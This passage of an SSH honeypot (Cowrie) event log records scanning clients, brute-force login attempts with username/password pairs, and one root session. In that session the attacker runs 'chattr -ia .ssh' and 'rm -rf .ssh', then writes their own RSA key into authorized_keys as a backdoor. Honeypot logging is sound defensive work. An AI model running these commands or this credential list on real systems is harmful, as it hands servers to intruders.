{"eventid":"cowrie.session.connect","src_ip":"81.26.205.105","src_port":38182,"dst_ip":"1.2.3.4","dst_port":22,"session":"71fc2cb2adb1","protocol":"ssh","message":"New connection: 81.26.205.105:38182 (1.2.3.4:22) [session: 71fc2cb2adb1]","sensor":"my-vps","timestamp":"2025-09-08T19:57:40.024729Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:41.908069Z","src_ip":"81.26.205.105","session":"71fc2cb2adb1"}
{"eventid":"cowrie.session.connect","src_ip":"81.26.205.105","src_port":38275,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8b80a6f1682","protocol":"ssh","message":"New connection: 81.26.205.105:38275 (1.2.3.4:22) [session: e8b80a6f1682]","sensor":"my-vps","timestamp":"2025-09-08T19:57:42.024583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ROSSSH","message":"Remote SSH version: SSH-2.0-ROSSSH","sensor":"my-vps","timestamp":"2025-09-08T19:57:42.150451Z","src_ip":"81.26.205.105","session":"e8b80a6f1682"}
{"eventid":"cowrie.client.kex","hassh":"e7c5793d3b7d9f4dd6bd9e027595e061","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512;aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes1256-ctr;hmac-sha1,hmac-sha2-256,hmac-sha2-512;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-256","rsa-sha2-512"],"encCS":["aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes1256-ctr"],"macCS":["hmac-sha1","hmac-sha2-256","hmac-sha2-512"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e7c5793d3b7d9f4dd6bd9e027595e061","sensor":"my-vps","timestamp":"2025-09-08T19:57:42.418742Z","src_ip":"81.26.205.105","session":"e8b80a6f1682"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-09-08T19:57:43.961707Z","src_ip":"81.26.205.105","session":"e8b80a6f1682"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:44.634173Z","src_ip":"139.19.117.131","session":"0e7dc4d12989"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:57:45.352865Z","src_ip":"81.26.205.105","session":"e8b80a6f1682"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":41054,"dst_ip":"1.2.3.4","dst_port":22,"session":"84accdf5fd39","protocol":"ssh","message":"New connection: 216.107.136.92:41054 (1.2.3.4:22) [session: 84accdf5fd39]","sensor":"my-vps","timestamp":"2025-09-08T19:58:31.218386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:58:31.219402Z","src_ip":"216.107.136.92","session":"84accdf5fd39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:58:31.309390Z","src_ip":"216.107.136.92","session":"84accdf5fd39"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"12345","message":"login attempt [testnet/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T19:58:31.711254Z","src_ip":"216.107.136.92","session":"84accdf5fd39"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:32.804395Z","src_ip":"216.107.136.92","session":"84accdf5fd39"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":46772,"dst_ip":"1.2.3.4","dst_port":22,"session":"2582cd625332","protocol":"ssh","message":"New connection: 77.75.56.63:46772 (1.2.3.4:22) [session: 2582cd625332]","sensor":"my-vps","timestamp":"2025-09-08T19:58:33.848024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:58:33.848885Z","src_ip":"77.75.56.63","session":"2582cd625332"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:58:33.888316Z","src_ip":"77.75.56.63","session":"2582cd625332"}
{"eventid":"cowrie.login.failed","username":"tester","password":"1234567890","message":"login attempt [tester/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T19:58:34.072262Z","src_ip":"77.75.56.63","session":"2582cd625332"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:35.128767Z","src_ip":"77.75.56.63","session":"2582cd625332"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":39132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6a7360e828e","protocol":"ssh","message":"New connection: 103.206.72.2:39132 (1.2.3.4:22) [session: e6a7360e828e]","sensor":"my-vps","timestamp":"2025-09-08T19:58:44.461139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:58:44.462086Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:58:44.636979Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEASDzxc123","message":"login attempt [root/QWEASDzxc123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:58:45.364141Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:58:45.734526Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:58:45.735264Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:58:45.736106Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:45.909946Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:58:46.354292Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.354968Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.530596Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.531568Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":39242,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f5093fcf32d","protocol":"ssh","message":"New connection: 103.206.72.2:39242 (1.2.3.4:22) [session: 8f5093fcf32d]","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.701102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.704986Z","src_ip":"103.206.72.2","session":"8f5093fcf32d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:58:46.874600Z","src_ip":"103.206.72.2","session":"8f5093fcf32d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:58:47.567150Z","src_ip":"103.206.72.2","session":"8f5093fcf32d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:48.742265Z","src_ip":"103.206.72.2","session":"8f5093fcf32d"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":39244,"dst_ip":"1.2.3.4","dst_port":22,"session":"c21673bbcef5","protocol":"ssh","message":"New connection: 103.206.72.2:39244 (1.2.3.4:22) [session: c21673bbcef5]","sensor":"my-vps","timestamp":"2025-09-08T19:58:48.918527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:58:48.919890Z","src_ip":"103.206.72.2","session":"c21673bbcef5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:58:49.098847Z","src_ip":"103.206.72.2","session":"c21673bbcef5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:58:49.812209Z","src_ip":"103.206.72.2","session":"c21673bbcef5"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:49.993942Z","src_ip":"103.206.72.2","session":"e6a7360e828e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:58:49.995025Z","src_ip":"103.206.72.2","session":"c21673bbcef5"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":58042,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b724fffde03","protocol":"ssh","message":"New connection: 77.75.56.63:58042 (1.2.3.4:22) [session: 7b724fffde03]","sensor":"my-vps","timestamp":"2025-09-08T19:59:40.268011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:59:40.268951Z","src_ip":"77.75.56.63","session":"7b724fffde03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:59:40.306201Z","src_ip":"77.75.56.63","session":"7b724fffde03"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"abc123","message":"login attempt [hammer/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T19:59:40.496656Z","src_ip":"77.75.56.63","session":"7b724fffde03"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:59:41.536160Z","src_ip":"77.75.56.63","session":"7b724fffde03"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":60738,"dst_ip":"1.2.3.4","dst_port":22,"session":"30d8888424eb","protocol":"ssh","message":"New connection: 103.206.72.2:60738 (1.2.3.4:22) [session: 30d8888424eb]","sensor":"my-vps","timestamp":"2025-09-08T20:00:06.792537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:00:06.793032Z","src_ip":"103.206.72.2","session":"30d8888424eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:00:06.968979Z","src_ip":"103.206.72.2","session":"30d8888424eb"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T20:00:07.720402Z","src_ip":"103.206.72.2","session":"30d8888424eb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:08.897774Z","src_ip":"103.206.72.2","session":"30d8888424eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37854,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c0943f1cb94","protocol":"ssh","message":"New connection: 212.227.125.160:37854 (1.2.3.4:22) [session: 6c0943f1cb94]","sensor":"my-vps","timestamp":"2025-09-08T20:00:41.466616Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:41.472297Z","src_ip":"212.227.125.160","session":"6c0943f1cb94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38130,"dst_ip":"1.2.3.4","dst_port":22,"session":"957cd3d2333c","protocol":"ssh","message":"New connection: 212.227.125.160:38130 (1.2.3.4:22) [session: 957cd3d2333c]","sensor":"my-vps","timestamp":"2025-09-08T20:00:41.586875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:00:41.588357Z","src_ip":"212.227.125.160","session":"957cd3d2333c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.co